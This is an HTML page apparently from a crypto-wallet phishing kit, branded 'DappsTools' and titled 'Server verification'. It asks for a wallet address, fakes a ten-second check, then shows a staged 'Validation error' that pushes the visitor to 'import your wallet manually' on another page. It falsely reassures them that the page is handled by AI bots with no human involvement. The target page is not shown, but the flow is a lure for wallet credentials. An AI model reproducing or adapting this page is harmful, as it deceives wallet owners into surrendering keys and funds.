<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="./assets/apple-touch-icon.png" rel="apple-touch-icon">
<link href="./assets/favicon.ico" rel="icon">
<link rel="shortcut icon" type="image/ico" href="favicon.ico" />
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css?family=Teko:700&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/css/bootstrap.min.css" integrity="sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO" crossorigin="anonymous">
<link href="./assets/css/style.css" rel="stylesheet">
<link rel="stylesheet" href="loading.css">
<title>Server verification</title>
</head>
<body>
<ul class="nav justify-content-end">
<li class="nav-item dapps">
<a class="nav-link" href="#" title=""><img id="wclogo" src="./assets/images/wclogo.png" /> <span class="">DappsTools</span></a>
</li>
</ul>
<div class="former">
<p class="wallet-head text-center">ENTER YOUR WALLET ADDRESS TO CONTINUE</p>
<div class="form-group text-center">
<label class="sub-text text-center">Ensure you enter an active wallet address. Inactive/empty wallets are likely to experience issues during synchronization.</label>
<input class="form-control form-control-lg text-center" type="text" placeholder="Enter address" required>
<button id="continue" type="button" style="background-color: #199EB8;" class="btn btn-primary addressButton">Continue</button>
</div>
</div>
<svg class="spinner" width="20%" height="20%" viewBox="0 0 66 66" xmlns="http://www.w3.org/2000/svg">
<circle class="path" fill="none" stroke-width="6" stroke-linecap="round" cx="33" cy="33" r="30"></circle>
</svg>

<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalCenterTitle" style="color: red;">Validation error</h5>
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">&times;</span>
</button>
</div>
<div class="modal-body">
We are unable to validate your Wallet, you are required to import your wallet manuallly.
The page you are about to be redirected to is handled by artificial intelligence bots with zero human interference.
</div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" id="close1" style="background-color: #199EB8;" data-dismiss="modal">Close</button>
<button type="button" class="btn btn-secondary" style="background-color: #199EB8;" id="proceed"><a style="color: white;" href="form1.html">Proceed</a></button>
</div>
</div>
</div>
</div>
</div>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.3/dist/umd/popper.min.js" integrity="sha384-ZMP7rVo3mIykV+2+9J3UJ46jBk0WLaUAdn689aCwoqbBJiSnjAK/l8WvCWPIPm49" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.1.3/dist/js/bootstrap.min.js" integrity="sha384-ChfqqxuZUCnJSK3+MXmPNIyE6ZbWh2IMqE241rYiqJxyMiZ6OW/JmZQ5stwEULTy" crossorigin="anonymous"></script>
<script>
          document.getElementById("continue").addEventListener("click", function(){
            $(".former").css("display", "none");
            $(".spinner").css("display", "block");
            setTimeout(function() {
            $('#exampleModalCenter').modal();
          }, 10000);}
          );
          document.getElementById("close1").addEventListener("click", function(){
            window.location.replace("./form.html");
          });
        </script>
</body>
</html>
